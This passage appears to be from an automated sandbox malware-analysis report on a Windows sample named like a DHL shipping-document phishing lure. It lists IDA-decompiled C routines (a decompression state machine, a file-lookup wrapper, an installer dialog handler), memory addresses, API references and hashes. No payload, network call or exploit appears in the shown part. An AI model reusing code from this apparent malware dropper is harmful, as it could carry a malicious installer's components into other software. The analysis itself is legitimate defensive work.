                        							if( *(__ebp - 0x40) != 0) {
                        								_t469 = __ebp - 0x58;
                        								 *_t469 =  *(__ebp - 0x58) + 0x204;
                        								__eflags =  *_t469;
                        								 *(__ebp - 0x30) = 0x10;
                        								 *(__ebp - 0x40) = 8;
                        								L144:
                        								 *(__ebp - 0x7c) = 0x14;
                        								goto L145;
                        							}
                        							__eax =  *(__ebp - 0x4c);
                        							__ecx =  *(__ebp - 0x58);
                        							__eax =  *(__ebp - 0x4c) << 4;
                        							 *(__ebp - 0x30) = 8;
                        							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                        							L130:
                        							 *(__ebp - 0x58) = __eax;
                        							 *(__ebp - 0x40) = 3;
                        							goto L144;
                        						case 0x14:
                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                        							__eax =  *(__ebp - 0x80);
                        							goto L140;
                        						case 0x15:
                        							__eax = 0;
                        							__eflags =  *(__ebp - 0x38) - 7;
                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        							__al = __al & 0x000000fd;
                        							__eax = (__eflags >= 0) - 1 + 0xb;
                        							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                        							goto L120;
                        						case 0x16:
                        							__eax =  *(__ebp - 0x30);
                        							__eflags = __eax - 4;
                        							if(__eax >= 4) {
                        								_push(3);
                        								_pop(__eax);
                        							}
                        							__ecx =  *(__ebp - 4);
                        							 *(__ebp - 0x40) = 6;
                        							__eax = __eax << 7;
                        							 *(__ebp - 0x7c) = 0x19;
                        							 *(__ebp - 0x58) = __eax;
                        							goto L145;
                        						case 0x17:
                        							L145:
                        							__eax =  *(__ebp - 0x40);
                        							 *(__ebp - 0x50) = 1;
                        							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                        							goto L149;
                        						case 0x18:
                        							L146:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0x18;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t484 = __ebp - 0x70;
                        							 *_t484 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t484;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							L148:
                        							_t487 = __ebp - 0x48;
                        							 *_t487 =  *(__ebp - 0x48) - 1;
                        							__eflags =  *_t487;
                        							L149:
                        							__eflags =  *(__ebp - 0x48);
                        							if( *(__ebp - 0x48) <= 0) {
                        								__ecx =  *(__ebp - 0x40);
                        								__ebx =  *(__ebp - 0x50);
                        								0 = 1;
                        								__eax = 1 << __cl;
                        								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                        								__eax =  *(__ebp - 0x7c);
                        								 *(__ebp - 0x44) = __ebx;
                        								goto L140;
                        							}
                        							__eax =  *(__ebp - 0x50);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        							__eax =  *(__ebp - 0x58);
                        							__esi = __edx + __eax;
                        							 *(__ebp - 0x54) = __esi;
                        							__ax =  *__esi;
                        							__edi = __ax & 0x0000ffff;
                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        							__eflags =  *(__ebp - 0xc) - __ecx;
                        							if( *(__ebp - 0xc) >= __ecx) {
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        								__cx = __ax;
                        								__cx = __ax >> 5;
                        								__eax = __eax - __ecx;
                        								__edx = __edx + 1;
                        								__eflags = __edx;
                        								 *__esi = __ax;
                        								 *(__ebp - 0x50) = __edx;
                        							} else {
                        								 *(__ebp - 0x10) = __ecx;
                        								0x800 = 0x800 - __edi;
                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        								 *__esi = __cx;
                        							}
                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                        							if( *(__ebp - 0x10) >= 0x1000000) {
                        								goto L148;
                        							} else {
                        								goto L146;
                        							}
                        						case 0x19:
                        							__eflags = __ebx - 4;
                        							if(__ebx < 4) {
                        								 *(__ebp - 0x2c) = __ebx;
                        								L119:
                        								_t393 = __ebp - 0x2c;
                        								 *_t393 =  *(__ebp - 0x2c) + 1;
                        								__eflags =  *_t393;
                        								L120:
                        								__eax =  *(__ebp - 0x2c);
                        								__eflags = __eax;
                        								if(__eax == 0) {
                        									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                        									goto L170;
                        								}
                        								__eflags = __eax -  *(__ebp - 0x60);
                        								if(__eax >  *(__ebp - 0x60)) {
                        									goto L171;
                        								}
                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                        								__eax =  *(__ebp - 0x30);
                        								_t400 = __ebp - 0x60;
                        								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                        								__eflags =  *_t400;
                        								goto L123;
                        							}
                        							__ecx = __ebx;
                        							__eax = __ebx;
                        							__ecx = __ebx >> 1;
                        							__eax = __ebx & 0x00000001;
                        							__ecx = (__ebx >> 1) - 1;
                        							__al = __al | 0x00000002;
                        							__eax = (__ebx & 0x00000001) << __cl;
                        							__eflags = __ebx - 0xe;
                        							 *(__ebp - 0x2c) = __eax;
                        							if(__ebx >= 0xe) {
                        								__ebx = 0;
                        								 *(__ebp - 0x48) = __ecx;
                        								L102:
                        								__eflags =  *(__ebp - 0x48);
                        								if( *(__ebp - 0x48) <= 0) {
                        									__eax = __eax + __ebx;
                        									 *(__ebp - 0x40) = 4;
                        									 *(__ebp - 0x2c) = __eax;
                        									__eax =  *(__ebp - 4);
                        									__eax =  *(__ebp - 4) + 0x644;
                        									__eflags = __eax;
                        									L108:
                        									__ebx = 0;
                        									 *(__ebp - 0x58) = __eax;
                        									 *(__ebp - 0x50) = 1;
                        									 *(__ebp - 0x44) = 0;
                        									 *(__ebp - 0x48) = 0;
                        									L112:
                        									__eax =  *(__ebp - 0x40);
                        									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                        										_t391 = __ebp - 0x2c;
                        										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                        										__eflags =  *_t391;
                        										goto L119;
                        									}
                        									__eax =  *(__ebp - 0x50);
                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        									__eax =  *(__ebp - 0x58);
                        									__esi = __edi + __eax;
                        									 *(__ebp - 0x54) = __esi;
                        									__ax =  *__esi;
                        									__ecx = __ax & 0x0000ffff;
                        									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                        									__eflags =  *(__ebp - 0xc) - __edx;
                        									if( *(__ebp - 0xc) >= __edx) {
                        										__ecx = 0;
                        										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                        										__ecx = 1;
                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                        										__ebx = 1;
                        										__ecx =  *(__ebp - 0x48);
                        										__ebx = 1 << __cl;
                        										__ecx = 1 << __cl;
                        										__ebx =  *(__ebp - 0x44);
                        										__ebx =  *(__ebp - 0x44) | __ecx;
                        										__cx = __ax;
                        										__cx = __ax >> 5;
                        										__eax = __eax - __ecx;
                        										__edi = __edi + 1;
                        										__eflags = __edi;
                        										 *(__ebp - 0x44) = __ebx;
                        										 *__esi = __ax;
                        										 *(__ebp - 0x50) = __edi;
                        									} else {
                        										 *(__ebp - 0x10) = __edx;
                        										0x800 = 0x800 - __ecx;
                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        										 *__esi = __dx;
                        									}
                        									__eflags =  *(__ebp - 0x10) - 0x1000000;
                        									if( *(__ebp - 0x10) >= 0x1000000) {
                        										L111:
                        										_t368 = __ebp - 0x48;
                        										 *_t368 =  *(__ebp - 0x48) + 1;
                        										__eflags =  *_t368;
                        										goto L112;
                        									} else {
                        										goto L109;
                        									}
                        								}
                        								__ecx =  *(__ebp - 0xc);
                        								__ebx = __ebx + __ebx;
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                        								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        								 *(__ebp - 0x44) = __ebx;
                        								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                        									__ecx =  *(__ebp - 0x10);
                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        									__ebx = __ebx | 0x00000001;
                        									__eflags = __ebx;
                        									 *(__ebp - 0x44) = __ebx;
                        								}
                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                        								if( *(__ebp - 0x10) >= 0x1000000) {
                        									L101:
                        									_t338 = __ebp - 0x48;
                        									 *_t338 =  *(__ebp - 0x48) - 1;
                        									__eflags =  *_t338;
                        									goto L102;
                        								} else {
                        									goto L99;
                        								}
                        							}
                        							__edx =  *(__ebp - 4);
                        							__eax = __eax - __ebx;
                        							 *(__ebp - 0x40) = __ecx;
                        							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                        							goto L108;
                        						case 0x1a:
                        							goto L55;
                        						case 0x1b:
                        							L75:
                        							__eflags =  *(__ebp - 0x64);
                        							if( *(__ebp - 0x64) == 0) {
                        								 *(__ebp - 0x88) = 0x1b;
                        								goto L170;
                        							}
                        							__eax =  *(__ebp - 0x14);
                        							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        							__eflags = __eax -  *(__ebp - 0x74);
                        							if(__eax >=  *(__ebp - 0x74)) {
                        								__eax = __eax +  *(__ebp - 0x74);
                        								__eflags = __eax;
                        							}
                        							__edx =  *(__ebp - 8);
                        							__cl =  *(__eax + __edx);
                        							__eax =  *(__ebp - 0x14);
                        							 *(__ebp - 0x5c) = __cl;
                        							 *(__eax + __edx) = __cl;
                        							__eax = __eax + 1;
                        							__edx = 0;
                        							_t274 = __eax %  *(__ebp - 0x74);
                        							__eax = __eax /  *(__ebp - 0x74);
                        							__edx = _t274;
                        							__eax =  *(__ebp - 0x68);
                        							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        							_t283 = __ebp - 0x64;
                        							 *_t283 =  *(__ebp - 0x64) - 1;
                        							__eflags =  *_t283;
                        							 *( *(__ebp - 0x68)) = __cl;
                        							goto L79;
                        						case 0x1c:
                        							while(1) {
                        								L123:
                        								__eflags =  *(__ebp - 0x64);
                        								if( *(__ebp - 0x64) == 0) {
                        									break;
                        								}
                        								__eax =  *(__ebp - 0x14);
                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        								__eflags = __eax -  *(__ebp - 0x74);
                        								if(__eax >=  *(__ebp - 0x74)) {
                        									__eax = __eax +  *(__ebp - 0x74);
                        									__eflags = __eax;
                        								}
                        								__edx =  *(__ebp - 8);
                        								__cl =  *(__eax + __edx);
                        								__eax =  *(__ebp - 0x14);
                        								 *(__ebp - 0x5c) = __cl;
                        								 *(__eax + __edx) = __cl;
                        								__eax = __eax + 1;
                        								__edx = 0;
                        								_t414 = __eax %  *(__ebp - 0x74);
                        								__eax = __eax /  *(__ebp - 0x74);
                        								__edx = _t414;
                        								__eax =  *(__ebp - 0x68);
                        								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                        								__eflags =  *(__ebp - 0x30);
                        								 *( *(__ebp - 0x68)) = __cl;
                        								 *(__ebp - 0x14) = __edx;
                        								if( *(__ebp - 0x30) > 0) {
                        									continue;
                        								} else {
                        									goto L80;
                        								}
                        							}
                        							 *(__ebp - 0x88) = 0x1c;
                        							goto L170;
                        					}
                        				}
                        			}













                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x00000000
                        0x00407390
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                        • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                        • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                        • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040699E(WCHAR* _a4) {
                        				void* _t2;
                        
                        				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                        				if(_t2 == 0xffffffff) {
                        					return 0;
                        				}
                        				FindClose(_t2);
                        				return 0x426798;
                        			}





                        APIs
                        • FindFirstFileW.KERNELBASE(74D0FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004069A9
                        • FindClose.KERNEL32(00000000), ref: 004069B5
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                        • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                        • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                        • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                        				struct HWND__* _v28;
                        				void* _v84;
                        				void* _v88;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t34;
                        				signed int _t36;
                        				signed int _t38;
                        				struct HWND__* _t48;
                        				signed int _t67;
                        				struct HWND__* _t73;
                        				signed int _t86;
                        				struct HWND__* _t91;
                        				signed int _t99;
                        				int _t103;
                        				signed int _t117;
                        				int _t118;
                        				int _t122;
                        				signed int _t124;
                        				struct HWND__* _t127;
                        				struct HWND__* _t128;
                        				int _t129;
                        				intOrPtr _t130;
                        				long _t133;
                        				int _t135;
                        				int _t136;
                        				void* _t137;
                        				void* _t145;
                        
                        				_t130 = _a8;
                        				if(_t130 == 0x110 || _t130 == 0x408) {
                        					_t34 = _a12;
                        					_t127 = _a4;
                        					__eflags = _t130 - 0x110;
                        					 *0x423730 = _t34;
                        					if(_t130 == 0x110) {
                        						 *0x42a268 = _t127;
                        						 *0x423744 = GetDlgItem(_t127, 1);
                        						_t91 = GetDlgItem(_t127, 2);
                        						_push(0xffffffff);
                        						_push(0x1c);
                        						 *0x421710 = _t91;
                        						E004045C4(_t127);
                        						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                        						 *0x42922c = E0040140B(4);
                        						_t34 = 1;
                        						__eflags = 1;
                        						 *0x423730 = 1;
                        					}
                        					_t124 =  *0x40a39c; // 0x0
                        					_t136 = 0;
                        					_t133 = (_t124 << 6) +  *0x42a280;
                        					__eflags = _t124;
                        					if(_t124 < 0) {
                        						L36:
                        						E00404610(0x40b);
                        						while(1) {
                        							_t36 =  *0x423730;
                        							 *0x40a39c =  *0x40a39c + _t36;
                        							_t133 = _t133 + (_t36 << 6);
                        							_t38 =  *0x40a39c; // 0x0
                        							__eflags = _t38 -  *0x42a284;
                        							if(_t38 ==  *0x42a284) {
                        								E0040140B(1);
                        							}
                        							__eflags =  *0x42922c - _t136;
                        							if( *0x42922c != _t136) {
                        								break;
                        							}
                        							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                        							if(__eflags >= 0) {
                        								break;
                        							}
                        							_t117 =  *(_t133 + 0x14);
                        							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                        							_push(0xfffffc19);
                        							E004045C4(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                        							_push(0xfffffc1b);
                        							E004045C4(_t127);
                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                        							_push(0xfffffc1a);
                        							E004045C4(_t127);
                        							_t48 = GetDlgItem(_t127, 3);
                        							__eflags =  *0x42a2ec - _t136;
                        							_v28 = _t48;
                        							if( *0x42a2ec != _t136) {
                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                        								__eflags = _t117;
                        							}
                        							ShowWindow(_t48, _t117 & 0x00000008);
                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                        							E004045E6(_t117 & 0x00000002);
                        							_t118 = _t117 & 0x00000004;
                        							EnableWindow( *0x421710, _t118);
                        							__eflags = _t118 - _t136;
                        							if(_t118 == _t136) {
                        								_push(1);
                        							} else {
                        								_push(_t136);
                        							}
                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                        							__eflags =  *0x42a2ec - _t136;
                        							if( *0x42a2ec == _t136) {
                        								_push( *0x423744);
                        							} else {
                        								SendMessageW(_t127, 0x401, 2, _t136);
                        								_push( *0x421710);
                        							}
                        							E004045F9();
                        							E00406668(0x423748, E004040A6());
                        							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                        							SetWindowTextW(_t127, 0x423748);
                        							_push(_t136);
                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                        							__eflags = _t67;
                        							if(_t67 != 0) {
                        								continue;
                        							} else {
                        								__eflags =  *_t133 - _t136;
                        								if( *_t133 == _t136) {
                        									continue;
                        								}
                        								__eflags =  *(_t133 + 4) - 5;
                        								if( *(_t133 + 4) != 5) {
                        									DestroyWindow( *0x429238);
                        									 *0x422720 = _t133;
                        									__eflags =  *_t133 - _t136;
                        									if( *_t133 <= _t136) {
                        										goto L60;
                        									}
                        									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                        									__eflags = _t73 - _t136;
                        									 *0x429238 = _t73;
                        									if(_t73 == _t136) {
                        										goto L60;
                        									}
                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                        									_push(6);
                        									E004045C4(_t73);
                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                        									ScreenToClient(_t127, _t137 + 0x10);
                        									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                        									_push(_t136);
                        									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                        									__eflags =  *0x42922c - _t136;
                        									if( *0x42922c != _t136) {
                        										goto L63;
                        									}
                        									ShowWindow( *0x429238, 8);
                        									E00404610(0x405);
                        									goto L60;
                        								}
                        								__eflags =  *0x42a2ec - _t136;
                        								if( *0x42a2ec != _t136) {
                        									goto L63;
                        								}
                        								__eflags =  *0x42a2e0 - _t136;
                        								if( *0x42a2e0 != _t136) {
                        									continue;
                        								}
                        								goto L63;
                        							}
                        						}
                        						DestroyWindow( *0x429238); // executed
                        						 *0x42a268 = _t136;
                        						EndDialog(_t127,  *0x421f18);
                        						goto L60;
                        					} else {
                        						__eflags = _t34 - 1;
                        						if(_t34 != 1) {
                        							L35:
                        							__eflags =  *_t133 - _t136;
                        							if( *_t133 == _t136) {
                        								goto L63;
                        							}
                        							goto L36;
                        						}
                        						_push(0);
                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                        						__eflags = _t86;
                        						if(_t86 == 0) {
                        							goto L35;
                        						}
                        						SendMessageW( *0x429238, 0x40f, 0, 1);
                        						__eflags =  *0x42922c;
                        						return 0 |  *0x42922c == 0x00000000;
                        					}
                        				} else {
                        					_t127 = _a4;
                        					_t136 = 0;
                        					if(_t130 == 0x47) {
                        						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                        					}
                        					_t122 = _a12;
                        					if(_t130 != 5) {
                        						L8:
                        						if(_t130 != 0x40d) {
                        							__eflags = _t130 - 0x11;
                        							if(_t130 != 0x11) {
                        								__eflags = _t130 - 0x111;
                        								if(_t130 != 0x111) {
                        									goto L28;
                        								}
                        								_t135 = _t122 & 0x0000ffff;
                        								_t128 = GetDlgItem(_t127, _t135);
                        								__eflags = _t128 - _t136;
                        								if(_t128 == _t136) {
                        									L15:
                        									__eflags = _t135 - 1;
                        									if(_t135 != 1) {
                        										__eflags = _t135 - 3;
                        										if(_t135 != 3) {
                        											_t129 = 2;
                        											__eflags = _t135 - _t129;
                        											if(_t135 != _t129) {
                        												L27:
                        												SendMessageW( *0x429238, 0x111, _t122, _a16);
                        												goto L28;
                        											}
                        											__eflags =  *0x42a2ec - _t136;
                        											if( *0x42a2ec == _t136) {
                        												_t99 = E0040140B(3);
                        												__eflags = _t99;
                        												if(_t99 != 0) {
                        													goto L28;
                        												}
                        												 *0x421f18 = 1;
                        												L23:
                        												_push(0x78);
                        												L24:
                        												E0040459D();
                        												goto L28;
                        											}
                        											E0040140B(_t129);
                        											 *0x421f18 = _t129;
                        											goto L23;
                        										}
                        										__eflags =  *0x40a39c - _t136; // 0x0
                        										if(__eflags <= 0) {
                        											goto L27;
                        										}
                        										_push(0xffffffff);
                        										goto L24;
                        									}
                        									_push(_t135);
                        									goto L24;
                        								}
                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                        								_t103 = IsWindowEnabled(_t128);
                        								__eflags = _t103;
                        								if(_t103 == 0) {
                        									L63:
                        									return 0;
                        								}
                        								goto L15;
                        							}
                        							SetWindowLongW(_t127, _t136, _t136);
                        							return 1;
                        						}
                        						DestroyWindow( *0x429238);
                        						 *0x429238 = _t122;
                        						L60:
                        						_t145 =  *0x425748 - _t136; // 0x0
                        						if(_t145 == 0 &&  *0x429238 != _t136) {
                        							ShowWindow(_t127, 0xa);
                        							 *0x425748 = 1;
                        						}
                        						goto L63;
                        					} else {
                        						asm("sbb eax, eax");
                        						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                        						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                        							L28:
                        							return E0040462B(_a8, _t122, _a16);
                        						} else {
                        							ShowWindow(_t127, 4);
                        							goto L8;
                        						}
                        					}
                        				}
                        			}
































                        0x0040419e
                        0x004041a0
                        0x004041a2
                        0x004041c1
                        0x004041c1
                        0x004041c4
                        0x004041c9
                        0x004041cc
                        0x004041dc
                        0x004041dd
                        0x004041df
                        0x00404215
                        0x00404225
                        0x00000000
                        0x00404225
                        0x004041e1
                        0x004041e7
                        0x00404200
                        0x00404205
                        0x00404207
                        0x00000000
                        0x00000000
                        0x00404209
                        0x004041f5
                        0x004041f5
                        0x004041f7
                        0x004041f7
                        0x00000000
                        0x004041f7
                        0x004041ea
                        0x004041ef
                        0x00000000
                        0x004041ef
                        0x004041ce
                        0x004041d4
                        0x00000000
                        0x00000000
                        0x004041d6
                        0x00000000
                        0x004041d6
                        0x004041c6
                        0x00000000
                        0x004041c6
                        0x004041ac
                        0x004041b3
                        0x004041b9
                        0x004041bb
                        0x00404591
                        0x00000000
                        0x00404591
                        0x00000000
                        0x004041bb
                        0x00404179
                        0x00000000
                        0x00404181
                        0x00404160
                        0x00404166
                        0x0040456e
                        0x0040456e
                        0x00404574
                        0x00404581
                        0x00404587
                        0x00404587
                        0x00000000
                        0x00404110
                        0x00404115
                        0x00404121
                        0x0040412a
                        0x0040422b
                        0x00000000
                        0x00404149
                        0x0040414c
                        0x00000000
                        0x0040414c
                        0x0040412a
                        0x0040410e

                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                        • ShowWindow.USER32(?), ref: 00404121
                        • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                        • ShowWindow.USER32(?,00000004), ref: 0040414C
                        • DestroyWindow.USER32 ref: 00404160
                        • SetWindowLongW.USER32 ref: 00404179
                        • GetDlgItem.USER32 ref: 00404198
                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                        • IsWindowEnabled.USER32(00000000), ref: 004041B3
                        • GetDlgItem.USER32 ref: 0040425E
                        • GetDlgItem.USER32 ref: 00404268
                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                        • GetDlgItem.USER32 ref: 00404379
                        • ShowWindow.USER32(00000000,?), ref: 0040439A
                        • EnableWindow.USER32(?,?), ref: 004043AC
                        • EnableWindow.USER32(?,?), ref: 004043C7
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                        • EnableMenuItem.USER32 ref: 004043E4
                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                        • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                        • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                        • ShowWindow.USER32(?,0000000A), ref: 00404581
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
